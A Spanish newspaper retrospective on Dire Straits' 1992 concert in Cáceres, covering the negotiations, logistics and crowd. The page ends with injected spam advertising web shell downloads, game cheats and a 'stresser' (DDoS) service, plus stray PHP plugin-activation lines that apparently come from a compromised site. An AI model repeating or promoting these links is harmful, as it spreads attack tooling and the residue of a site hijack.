Cáceres se postra ante los ‘sultanes del swing’


Hay riffs de guitarra tan legendarios que bastan unos pocos segundos para empezar a mover la cabeza al compás. Es el caso de ‘Money for nothing’, ‘Sultans of swing’ o ‘Walk of life’. Auténticos himnos que una vez, allá por 1992, hicieron disfrutar en directo a 35.000 personas en Cáceres. Fue la única ocasión en la que Dire Straits ha actuado en Extremadura.

No fue sencillo que la banda recalase en la región. La empresa de espectáculos encargada de traer a Mark Knopfler y a los suyos reconoció que habían sido negociaciones «muy duras». Además, hubo que convencer al líder con libros y vídeos de la capital cacereña. Tras verlos, le llamó la atención que las cigüeñas conviviesen en armonía con los humanos. Y aceptó tocar.

El grupo aterrizó en su avión privado en Talavera la Real el 29 de agosto y llegó a Cáceres en cuatro vehículos de la marca Mercedes (exigidos por contrato). Había tanto ambiente en la ciudad (la mayoría de los asistentes fueron extremeños, ya que un alto porcentaje de entradas se vendió en taquillas de la región) que se acabaron todos los bocadillos y billetes en los cajeros. Además, había camas reservadas en todos los hospitales de la región, pero afortunadamente no hubo ningún percance grave, solo leves lipotimias o intoxicaciones etílicas.

El estadio Príncipe Felipe vibró con las más de dos horas de concierto que este diario cubrió con varias informaciones previas y una extensa crónica que arrojó detalles tan interesantes para los fans como que los componentes del grupo fueron a jugar al tenis a la mañana siguiente del espectáculo y pasearon por la Ciudad Monumental, la cual pidieron que estuviera iluminada. Fue sin duda uno de los mayores eventos culturales acontecidos en Extremadura en 1992.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Shell İndir Oyun Hileleri stresser

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );